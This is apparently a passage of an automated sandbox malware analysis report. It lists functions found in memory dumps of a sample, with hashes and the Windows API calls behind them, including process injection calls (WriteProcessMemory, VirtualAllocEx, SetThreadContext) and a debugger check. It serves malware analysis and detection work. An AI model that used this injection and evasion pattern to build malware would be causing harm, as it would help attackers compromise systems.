Opcode Fuzzy Hash: e2412492132c7ce509a2f970cf22a70eb87752efa29562bd7d4c5b6a78383f51
Instruction Fuzzy Hash: 8B31FBB1E046598FEB58CF6ADC41B9EBBB7AFC9200F14C1BAD408A7255DB305A45CF21

Function 079135A8 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e2d620b87fec5c53d9c409dd5935a80c8114b394e4f6fb95efd7ade6e9b9eaa
Instruction ID: 6bedbd3d0ee840c1da43c3eb112ed5a8bbff034b6080c1296aaec7c718e15b86
Opcode Fuzzy Hash: 9e2d620b87fec5c53d9c409dd5935a80c8114b394e4f6fb95efd7ade6e9b9eaa
Instruction Fuzzy Hash: 9B21ECB1E116189BEB58CF6BD84069EF7F7AFC8200F04C5BAC508A6264EB3416558F51

Function 00E25470 Relevance: 12.8, Strings: 10, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Zq, xrefs: 00E25624
Zq, xrefs: 00E255AF
Yq, xrefs: 00E255C4
Zq, xrefs: 00E25665
Zq, xrefs: 00E2553C
Zq, xrefs: 00E25500
Zq, xrefs: 00E25569
Zq, xrefs: 00E25634
Zq, xrefs: 00E25579
Zq, xrefs: 00E25510

Memory Dump Source

Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd

Similarity

API ID:
String ID: Yq$Zq$Zq$Zq$Zq$Zq$Zq$Zq$Zq$Zq
API String ID: 0-3337616164
Opcode ID: 548b6857d75972c2745d7d370e5be62455d7481855d70406f0e1ffdd26f5fe60
Instruction ID: d66c021e3c1eff4e8ab18e5343a46dfabdfdf057cbea669e9be07e147e086d35
Opcode Fuzzy Hash: 548b6857d75972c2745d7d370e5be62455d7481855d70406f0e1ffdd26f5fe60
Instruction Fuzzy Hash: B0A14C31B10A28DFDB04DB99EA54BADB7B2BF88311F645466E402BB390DB74DC81CB51

Function 00E25461 Relevance: 9.0, Strings: 7, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Zq, xrefs: 00E25624
Zq, xrefs: 00E255AF
Yq, xrefs: 00E255C4
Zq, xrefs: 00E25665
Zq, xrefs: 00E2553C
Zq, xrefs: 00E25500
Zq, xrefs: 00E25569

Memory Dump Source

Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd

Similarity

API ID:
String ID: Yq$Zq$Zq$Zq$Zq$Zq$Zq
API String ID: 0-3716531607
Opcode ID: f1566951ad4b9fd2cca44df0d724c4bf37c69f2e17d31a6d7d2158ac8eab2539
Instruction ID: d76d93d969c214b05bf5d80db25effae70a2c6cc866dfb0e54da55b0448152d1
Opcode Fuzzy Hash: f1566951ad4b9fd2cca44df0d724c4bf37c69f2e17d31a6d7d2158ac8eab2539
Instruction Fuzzy Hash: 1C819E32A04A24DFDB14DF69EA547ADB7B2BF44311F645066E402BB3A0DB74DC81CB51

Function 04FECA30 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04FECABE
GetCurrentThread.KERNEL32 ref: 04FECAFB
GetCurrentProcess.KERNEL32 ref: 04FECB38
GetCurrentThreadId.KERNEL32 ref: 04FECB91

Memory Dump Source

Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b9c54e43b525c29b63a77e5342e04789b84b390601608460c5ecc3d67bdc5f9f
Instruction ID: ab6b84df02ad07b4d88c8e2afc7cd7434f208ed86096cd7c678e6342dbd8647d
Opcode Fuzzy Hash: b9c54e43b525c29b63a77e5342e04789b84b390601608460c5ecc3d67bdc5f9f
Instruction Fuzzy Hash: 97515CB0D003498FEB14CFAAD548BEEBBF1EF88314F208459E419A7350D774A946CB66

Function 04FECA40 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04FECABE
GetCurrentThread.KERNEL32 ref: 04FECAFB
GetCurrentProcess.KERNEL32 ref: 04FECB38
GetCurrentThreadId.KERNEL32 ref: 04FECB91

Memory Dump Source

Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 86bd177d0ef6afb728b3ef4f9d931250591d8a7f759c7ed7e19e20234674fb2e
Instruction ID: 484bd974083af90fe839cb08c5dd2d53d684439c7d53cd9804370c3601f56b96
Opcode Fuzzy Hash: 86bd177d0ef6afb728b3ef4f9d931250591d8a7f759c7ed7e19e20234674fb2e
Instruction Fuzzy Hash: B35149B0D007498FEB14CFAAD548BAEBBF1EF88314F208459E419A7350D778A945CF66

Function 07630328 Relevance: 4.0, Strings: 3, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(q, xrefs: 07632CB9
(q, xrefs: 07632D57
(q, xrefs: 07632CE5

Memory Dump Source

Source File: 00000000.00000002.1973434926.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7630000_5qJ6QQTcRS.jbxd

Similarity

API ID:
String ID: (q$(q$(q
API String ID: 0-2103260149
Opcode ID: 601da95df002f6ca36c5dd93c0658d04773a5fb1b7b211a4dd6ae58448d8fee8
Instruction ID: f327f1e90d90c63db00c495a332601649dd6be25522d44a71b0880242c908823
Opcode Fuzzy Hash: 601da95df002f6ca36c5dd93c0658d04773a5fb1b7b211a4dd6ae58448d8fee8
Instruction Fuzzy Hash: 58A19DB0A003099FDB14DFA9C85479EBBF1FF89310F248569E40AAB351DB74A985CB91

Function 00E27088 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

,q, xrefs: 00E27168
,q, xrefs: 00E2715E

Memory Dump Source

Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 147b8f45d904a3198618232f14474e3a7b92a717eaf0312b403bc1dc29fc11f2
Instruction ID: 424c55d1fa149cecb3075f40b8802374be0983df1749daea0b343c6f7bad30f1
Opcode Fuzzy Hash: 147b8f45d904a3198618232f14474e3a7b92a717eaf0312b403bc1dc29fc11f2
Instruction Fuzzy Hash: 98819075A08525CFCB14CF69D884AA9B7B5FF89304B24A165E446F7375D731EC40CBA0

Function 00E26998 Relevance: 2.7, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

Hq, xrefs: 00E26B69
Hq, xrefs: 00E26B9C

Memory Dump Source

Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: a02e72552ae2d37b5244499f1bad16efe507ba3143b54993d57a7ceb04f803be
Instruction ID: ab972ba0c21c9b2f38b187050864060d29b8414da14209d6db76e159bb1fb7bb
Opcode Fuzzy Hash: a02e72552ae2d37b5244499f1bad16efe507ba3143b54993d57a7ceb04f803be
Instruction Fuzzy Hash: 7B81DB30700224AFDB08EF65D829BAE7BA6EB88305F148129F506EB3C4DF749D41CB94

Function 00E2E0D8 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

Hq, xrefs: 00E2E1F2
Hq, xrefs: 00E2E1BF

Memory Dump Source

Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 895ef44466fc9abd1fda4a201b823e91615854183b7453a886581ceacfc51908
Instruction ID: cff9fda619a383ca1ebdb5738bd43904b69e0a560417ff9fd0ea5c9c32a59bd6
Opcode Fuzzy Hash: 895ef44466fc9abd1fda4a201b823e91615854183b7453a886581ceacfc51908
Instruction Fuzzy Hash: 5241DE713002759FEB169F25EC05AAE7BE2FF89304F059569E806AB391DB38DC20C791

Function 04FEA7B0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04FEAA06

Memory Dump Source

Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a709a25fbf36f00ab29e25d6c7c1e9e907e2ef11bafb761a8062477aeb732b51
Instruction ID: ee207d8a5ba3c4a3edc9c6441b2a0a093db355eceaa2715dc3639af553ae4342
Opcode Fuzzy Hash: a709a25fbf36f00ab29e25d6c7c1e9e907e2ef11bafb761a8062477aeb732b51
Instruction Fuzzy Hash: 0E711370A00B058FEB24DF6AD45076ABBF1FF88205F008929D48AD7A50DB75F94ACB91

Function 0769FD48 Relevance: 1.7, APIs: 1, Instructions: 155COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0769FCFF

Memory Dump Source

Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d5148365fe92684fbe1e0b8a7418647908596b5c2e7eb7dfffca5f88b81a1d6d
Instruction ID: d90d3f78b24e808178b7e142de2f5e3695f6da5542173e880f8d899c7be11e75
Opcode Fuzzy Hash: d5148365fe92684fbe1e0b8a7418647908596b5c2e7eb7dfffca5f88b81a1d6d
Instruction Fuzzy Hash: 865135B1E002099FCB04DFE9D8516EEBBF6EF89310F14842AD419B7354EB7499428FA1

Function 061218E4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06121A02

Memory Dump Source

Source File: 00000000.00000002.1972501213.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6120000_5qJ6QQTcRS.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d7ac86ecdcd5bc7f2f98cd77c932be1dd6a16e179b8a50c2285d05568a776305
Instruction ID: 674673a41530c04fe74506e5676d73a457a403ce250b086819b21547e1ff3244
Opcode Fuzzy Hash: d7ac86ecdcd5bc7f2f98cd77c932be1dd6a16e179b8a50c2285d05568a776305
Instruction Fuzzy Hash: FA51C2B1D00359AFDF14CF9AC885ADEBBB5FF48310F24852AE819AB210D7759985CF90

Function 061218F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06121A02

Memory Dump Source

Source File: 00000000.00000002.1972501213.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6120000_5qJ6QQTcRS.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2d39f7fc93858ad5bdbe02fa51f71d07948fdfc692cde4e6309000c00c43194f
Instruction ID: 3956d82fa6b51da638a39c866fe46ab809876d41efbabebe9710317e8df2394f
Opcode Fuzzy Hash: 2d39f7fc93858ad5bdbe02fa51f71d07948fdfc692cde4e6309000c00c43194f
Instruction Fuzzy Hash: E141C0B1D00359AFDF14CF9AC885ADEBBB5FF48310F24852AE819AB210D7759985CF90

Function 0757C852 Relevance: 1.6, APIs: 1, Instructions: 105fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 0757C920

Memory Dump Source

Source File: 00000000.00000002.1973308421.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_5qJ6QQTcRS.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 2fd85e6cef06957dba172a4a5c027c964c064606a064949f5e64e0da1cc9bb93
Instruction ID: 0707984c168660334f6b4c42d5407291cf5644cf9acccb847547dffc5c398446
Opcode Fuzzy Hash: 2fd85e6cef06957dba172a4a5c027c964c064606a064949f5e64e0da1cc9bb93
Instruction Fuzzy Hash: 4C318EB180E7D55FC712CB65D8546D9BFB0AF07210F0981DBD495EB293D2385849CBB2

Function 06123EB0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06123F71

Memory Dump Source

Source File: 00000000.00000002.1972501213.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6120000_5qJ6QQTcRS.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: abe13d7296485757cd9d00be376ed144726535cfaef34ce7bbcf83f276c49d5b
Instruction ID: d242020bb512153faf5cc43b549a4f0d3b8af658ef3d7628007235e4d0799234
Opcode Fuzzy Hash: abe13d7296485757cd9d00be376ed144726535cfaef34ce7bbcf83f276c49d5b
Instruction Fuzzy Hash: 9C4117B49003558FDB14CF99C448AABFBF5FB88314F258459E519A7361D738A841CBA1

Function 04FEFE53 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04FEFEEE

Memory Dump Source

Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7c6124f3a2ec26ace4c4c1f87a6eb1aac5c6d44f26623c5d62f57d531c0559e1
Instruction ID: 21e6932ff3a23d47db27256b7833240a7d49fb74c96e55ad7837774eeadb1231
Opcode Fuzzy Hash: 7c6124f3a2ec26ace4c4c1f87a6eb1aac5c6d44f26623c5d62f57d531c0559e1
Instruction Fuzzy Hash: 93218C71D003499FDB10DFAAC4817EEBBF5EF89320F14842AD459A7641CB78A985CFA1

Function 00AF0350 Relevance: 1.6, APIs: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00AF031D

Memory Dump Source

Source File: 00000000.00000002.1963896873.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_af0000_5qJ6QQTcRS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 29e5fa84aa5ca53d2af40ec90144a9315ca3c551e720f041f15013a8d78a5834
Instruction ID: fb1bd9cc6c1881d79dab6bf2cc46e7e6052ced8544bc2fc131ac6dca02e2de65
Opcode Fuzzy Hash: 29e5fa84aa5ca53d2af40ec90144a9315ca3c551e720f041f15013a8d78a5834
Instruction Fuzzy Hash: BF21E071D0421C8BEF20DBE5D944BEEBBF4AF88310F144159EA45BB242CB795D44CBA1

Function 0769F7E1 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0769F878

Memory Dump Source

Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3979530a8d5a8f3c638f79dadb3a4a12cd456b23ab2c847f74e210f4fa774a88
Instruction ID: 07d97bd45f08f9cda5e71c34f0fb6aed4517e0f377cde7f22c7ae8c14303a902
Opcode Fuzzy Hash: 3979530a8d5a8f3c638f79dadb3a4a12cd456b23ab2c847f74e210f4fa774a88
Instruction Fuzzy Hash: 412106B19003599FDF10DFA9C9857DEBBF5FF48310F148429E919A7250D7789941CBA0

Function 0769F7E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0769F878

Memory Dump Source

Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 44c635bae0acae05e8e67c2e2b22a941e57cd2c84bed13370ee56707b9ef1a84
Instruction ID: b268ce7fff2daeca3dfde18c6a96e92fe89ee3c3fc23a59a10318f8d72290528
Opcode Fuzzy Hash: 44c635bae0acae05e8e67c2e2b22a941e57cd2c84bed13370ee56707b9ef1a84
Instruction Fuzzy Hash: 572115B19003599FDB10CFAAC985BDEBBF5FF48310F108429E919A7240D7789941CBA0

Function 04FE01F3 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 04FE026F

Memory Dump Source

Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: dddbe10ad5bcfc2b5d325d0a39bc7214411e5d81686216859baf75acf7165a6e
Instruction ID: c04846b5d81a024879f7bb17fa6f52020a210a1fe9844ed699306d6beff0f958
Opcode Fuzzy Hash: dddbe10ad5bcfc2b5d325d0a39bc7214411e5d81686216859baf75acf7165a6e
Instruction Fuzzy Hash: 332145B1C012598FDB10CFAAD885BEEFBF4EF49310F14841AE859A7250D778A945CF61

Function 0769D33E Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0769D3D3

Memory Dump Source

Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4adb8dc47df5b8268cc24c8c533c36d7548602f477cf073fd20ac4e14e722dc7
Instruction ID: 781aa35d38e3524ace070abb1a0fc91559cb078adc4491bbaa8d35c585ae2651
Opcode Fuzzy Hash: 4adb8dc47df5b8268cc24c8c533c36d7548602f477cf073fd20ac4e14e722dc7
Instruction Fuzzy Hash: 2C2126B590425A9FDB10CFAAC485BDEFBF8EF49310F10842AE458A7251D378A544CFA1

Function 04FECC54 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04FED056,?,?,?,?,?), ref: 04FED117

Memory Dump Source

Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3b86d09266e2cbb80688beb556dc484fd0e9f70787ee8447275b3df737be1e00
Instruction ID: 01685598f4005a449c5a294931a2c80d529533e67af980d0075392691d75d766
Opcode Fuzzy Hash: 3b86d09266e2cbb80688beb556dc484fd0e9f70787ee8447275b3df737be1e00
Instruction Fuzzy Hash: 5521E5B5D00349AFDB10CF9AD484BEEBBF5EB48310F14841AE918A3350D379A951CFA5

Function 04FED08B Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04FED056,?,?,?,?,?), ref: 04FED117

Memory Dump Source

Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 26eb32316e65e192c2da93484bda275bc71c5da4425df0ab025ffd3c256fd51a
Instruction ID: be2efec559b338dd3d0c30a213d0f27118b19a6d61cf89a61834465c99756376
Opcode Fuzzy Hash: 26eb32316e65e192c2da93484bda275bc71c5da4425df0ab025ffd3c256fd51a
Instruction Fuzzy Hash: 5721E4B5D003599FDB10CF9AD884ADEFBF9EB48310F14841AE918A3310D379A945CFA5

Function 04FEFE70 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04FEFEEE

Memory Dump Source

Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 355dc58fbe5011cecb2983f5c2be52acff8b664726e60c7b603235b037720e2a
Instruction ID: fcd43b0a472ca8758d5501fc5fc7a8a89585c48b21a60c0778f47c287c101b45
Opcode Fuzzy Hash: 355dc58fbe5011cecb2983f5c2be52acff8b664726e60c7b603235b037720e2a
Instruction Fuzzy Hash: 7A214971D003089FDB10DFAAC4857EEBBF5EF48320F14842AD419A7241CB78A945CFA1

Function 0791F9A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0791FA1E

Memory Dump Source

Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e3c16d56af874ab31b28d5e9e104bc0d5f8e4fe22f64df162e11c731cd61b87f
Instruction ID: 5c31fe6536794cc7e5d5e1c838a7a95f964deb2fa276101b0ce1140287dccae8
Opcode Fuzzy Hash: e3c16d56af874ab31b28d5e9e104bc0d5f8e4fe22f64df162e11c731cd61b87f
Instruction Fuzzy Hash: 7D2115B1D007099FDB10DFAAC4857EEBBF5EF48324F14842AD459A7240DB78A985CFA0

Function 0769FC80 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0769FCFF

Memory Dump Source

Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c537faf3f782d812bb2b2417034f5464efc4e9bf92e22d41fec00f8419f6ef36
Instruction ID: 21969eff10d21f500c0a83831fa7ee0c4e95326095d7f386214ad790687916f7
Opcode Fuzzy Hash: c537faf3f782d812bb2b2417034f5464efc4e9bf92e22d41fec00f8419f6ef36
Instruction Fuzzy Hash: F72137B1C007499FDB20DFAAC4447EEBBF5EF48320F148429D459A7250DB799945CFA1

Function 0769FC88 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0769FCFF

Memory Dump Source

Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6157a66178235a88fa432c4eb116bd78cdf7c1d6645554202ffb36cd77d8780e
Instruction ID: bd7966b421ceb4433934c34af58dae28d56d8d8bfce4cc06370abf2b222d4323
Opcode Fuzzy Hash: 6157a66178235a88fa432c4eb116bd78cdf7c1d6645554202ffb36cd77d8780e
Instruction Fuzzy Hash: 3B2104B1D003499FDB10DFAAC484BEEBBF5EF48320F148429E519A7240DB79A945CFA1

Function 075737AC Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 0757C920

Memory Dump Source

Source File: 00000000.00000002.1973308421.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_5qJ6QQTcRS.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 512d58c1d270cd545e55509f91e1404ad4138839f0dd399be29b4ab870b90696
Instruction ID: 14205da5d0072b71e0f846731e186d0f757e56a5c740837ca242df05a89b34b1
Opcode Fuzzy Hash: 512d58c1d270cd545e55509f91e1404ad4138839f0dd399be29b4ab870b90696
Instruction Fuzzy Hash: 792138B1C0065A9BDB20CF9AD445BEEFBF4FF48320F14852AD858A7240D778A941CFA5

Function 079167C8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07916843

Memory Dump Source

Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b8be9c0df169235665f1bc0eabb0492b512c9c4393613672902906c9908b61ac
Instruction ID: e975294723a50a76baaf1437c814fd7f1143b113c6fcd791e6466b1194c75684
Opcode Fuzzy Hash: b8be9c0df169235665f1bc0eabb0492b512c9c4393613672902906c9908b61ac
Instruction Fuzzy Hash: CF2124B5D002499FCB10CF9AC484BDEFBF4FB48320F10842AE858A7650D778A584CFA1

Function 0769D360 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0769D3D3

Memory Dump Source

Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3246606f856c825d7210dc1054360886d69cfbd43c2b89f66ee097ea42e160f3
Instruction ID: d4bc9a78b5a0504b51e75200725b91c6174920e7db0534b0aaa5d09a644cb227
Opcode Fuzzy Hash: 3246606f856c825d7210dc1054360886d69cfbd43c2b89f66ee097ea42e160f3
Instruction Fuzzy Hash: 3621D3B59002499FDB10DF9AC484BDEFBF8EF49320F10842AE959A7250D778A945CFA1

Function 0769F4A0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0769F516

Memory Dump Source

Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
